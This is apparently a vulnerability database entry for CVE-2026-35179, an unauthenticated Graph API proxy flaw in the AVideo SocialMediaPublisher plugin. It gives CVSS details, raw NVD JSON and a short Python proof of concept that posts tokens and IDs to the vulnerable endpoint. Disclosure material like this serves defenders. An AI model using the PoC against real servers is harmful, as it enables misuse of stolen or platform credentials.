Security Vulnerability Report
中文
CVE-2026-35179 CVSS 5.3 MEDIUM

CVE-2026-35179

Published: 2026-04-06 20:16:26
Last Modified: 2026-04-23 15:31:52
Source: [email protected]

Description

WWBN AVideo is an open source video platform. In versions 26.0 and prior, the SocialMediaPublisher plugin exposes a publishInstagram.json.php endpoint that acts as an unauthenticated proxy to the Facebook/Instagram Graph API. The endpoint accepts user-controlled parameters including an access token, container ID, and Instagram account ID, and passes them directly to the Graph API via InstagramUploader::publishMediaIfIsReady(). This allows any unauthenticated user to make arbitrary Graph API calls through the server, potentially using stolen tokens or abusing the platform's own credentials.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:* - VULNERABLE
WWBN AVideo <= 26.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-35179: Unauthenticated Proxy in AVideo import requests def exploit_poc(target_url): # The vulnerable endpoint endpoint = f"{target_url}/plugin/SocialMediaPublisher/publishInstagram.json.php" # Malicious payload parameters to be proxied # An attacker would use a stolen token or test with the server's own credentials data = { "access_token": "EAABwzLixnjYBAO...", # Example token "container_id": "123456789", "ig_account_id": "987654321" } try: print(f"[*] Sending request to {endpoint}...") response = requests.post(endpoint, data=data, timeout=10) if response.status_code == 200: print("[+] Request sent successfully via proxy.") print(f"[+] Response: {response.text}") else: print(f"[-] Server returned status code: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "http://localhost" # Replace with actual target exploit_poc(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35179", "sourceIdentifier": "[email protected]", "published": "2026-04-06T20:16:26.080", "lastModified": "2026-04-23T15:31:52.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions 26.0 and prior, the SocialMediaPublisher plugin exposes a publishInstagram.json.php endpoint that acts as an unauthenticated proxy to the Facebook/Instagram Graph API. The endpoint accepts user-controlled parameters including an access token, container ID, and Instagram account ID, and passes them directly to the Graph API via InstagramUploader::publishMediaIfIsReady(). This allows any unauthenticated user to make arbitrary Graph API calls through the server, potentially using stolen tokens or abusing the platform's own credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-x9w5-xccw-5h9w", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.